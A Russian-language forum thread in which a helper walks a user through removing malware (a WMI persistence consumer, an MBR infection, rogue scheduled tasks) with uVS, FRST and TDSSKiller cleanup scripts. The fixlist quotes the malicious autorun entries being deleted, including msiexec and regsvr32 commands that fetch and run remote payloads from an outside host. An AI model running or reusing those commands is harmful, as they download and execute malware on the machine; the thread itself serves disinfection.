Вирус

[DarkKiber]

Вирус

Всем привет!
Вообщем случилась такая проблема - подхватил вирус после установки кое-какой программы

а именно Sony Vegas

После того схватил вирус на компе появился пользователь ASP(на данный момент удалён)
Ну и в целом начал прилично подвисать компьютер вне зависимости от того что я делаю

Нужна помощь

Логи прицепил

Заранее спасибо

 

[DarkKiber]

И ещё момент

Два файла на которые постоянно ругается антивирус это v.exe и conhost.exe

 

[mike 1]

1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
   

   ;uVS v4.0.23 [http://dsrt.dyndns.org]
   ;Target OS: NTv6.1
   v400c
   breg
   
   regt 26
   delref A.EXE
   delref HTTP://JS.FTP0930.HOST:280/HELLOWORLD.MSI
   delref HTTP://JS.FTP0930.HOST:280/V.SCT
   delref S.DAT
   delref S.RAR
   delref KERNCAP.VBS
   delall %SystemRoot%\DEBUG\ITEM.DAT
   delall %SystemRoot%\DEBUG\OK.DAT
   delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE
   delref S&C:\WINDOWS\UPDATE.EXE
   deltmp
   restart

4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен..

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
5. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

[DarkKiber]

Хорошо, uVS сделал
остался только Farbar

 

[DarkKiber]

Вот логи

Всё сделал)

 

[mike 1]

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Сохраните файл fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool
3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
4. Обратите внимание, что компьютер будет перезагружен.
5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

[DarkKiber]

Вот лог

Архив загрузил на нужный сайт

 

[mike 1]

Повторите логи FRST.txt, Addition.txt

 

[DarkKiber]

Вот логи

на данный момент всё вроде бы спокойно =)

 

[mike 1]

Да не все спокойно судя по логам.

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
   

   CreateRestorePoint:
   CloseProcesses:
   HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.ftp0930.host:280/helloworld.msi /q <==== ATTENTION
   HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll <==== ATTENTION
   HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{6ab6745c-02bf-4cde-884c-f4422374dc5f} <==== ATTENTION (Restriction - IP)
   S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
   2018-10-20 10:55 - 2018-10-20 10:55 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
   2018-10-20 10:55 - 2018-10-20 10:55 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
   2018-10-20 10:55 - 2018-10-20 10:55 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
   2018-10-20 10:55 - 2018-10-20 10:55 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
   2018-10-20 10:55 - 2018-10-20 10:55 - 000003186 _____ C:\Windows\System32\Tasks\ok
   2018-10-20 10:55 - 2018-10-20 10:55 - 000000067 _____ C:\Program Files\Common Files\xpdown.dat
   2018-10-20 10:55 - 2018-10-20 10:55 - 000000005 _____ C:\Windows\system32\1.txt
   2018-10-20 01:47 - 2018-10-20 01:47 - 003514368 ____S C:\Windows\tasksche.exe
   2018-10-20 10:55 - 2018-10-20 10:55 - 000000067 _____ () C:\Program Files\Common Files\xpdown.dat
   WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
   zip:C:\FRST\Quarantine
   EmptyTemp:

3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
4. Обратите внимание, что компьютер будет перезагружен.
5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

Далее сделайте лог uVS с загрузочного диска https://chklst.ru/discussion/61/winpe-uvs

 

[DarkKiber]

Вот логи пока что

Щас сделаю образ

 

[DarkKiber]

Вот образ автозапуска через загрузочный диск

 

[mike 1]

uVS v4.0.5 [http://dsrt.dyndns.org]: Windows (TM) 8 Preinstallation Environment x86 (NT v10.0 SP0) build 10240 [X:\WINDOWS]

А выбрали тот диск?

 

[DarkKiber]

Да, увидел
мой косяк

Щас новый сделаю

 

[DarkKiber]

Теперь всё должно быть правильно)

 

[mike 1]

У вас MBR заражена.

1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
2. Запустите файл TDSSKiller.exe.
3. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
4. В процессе проверки могут быть обнаружены объекты двух типов:
   • вредоносные (точно было установлено, какой вредоносной программой поражен объект);
   • подозрительные (тип вредоносного воздействия точно установить невозможно).
5. По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
6. Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
7. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
8. Самостоятельно без указания консультанта ничего не удаляйте!!!
9. После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
10. Прикрепите лог утилиты к своему следующему сообщению

По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

 

[DarkKiber]

ВОт логи данной программы

 

[mike 1]

1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
2. Скопируйте следующий текст в Блокнот и сохраните в папку с распакованным TDSSKiller.exe, как fix.bat:
   

   tdsskiller.exe -silent -qmbr -qboot -qsus

3. Запустите файл fix.bat;
4. Найдите в корне системного диска (обычно это диск C:) папку TDSSkiller_Quarantine;
5. Запакуйте эту папку в архив с паролем "virus";
6. Полученный архив отправьте на этот почтовый ящик: mike1@kasperskyclub.ru с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

Далее загрузитесь с загрузочного диска, откройте uVS и выполните следующий скрипт:

;uVS v4.1.1 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
fixmbr MBR#0 [931,5GB]

Далее сделайте новый лог uVS из обычного режима.

 

[DarkKiber]

Вот последний образ
Через обычный режим

 

[mike 1]

Карантин получил. Спасибо.

Выполните скрипт в uVS:

;uVS v4.0.12 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
breg

regt 26
delref WMI_.[FUCKYOUMM2_FILTER]
restart

Компьютер перезагрузится.

Повторите логи FRST.txt, Addition.txt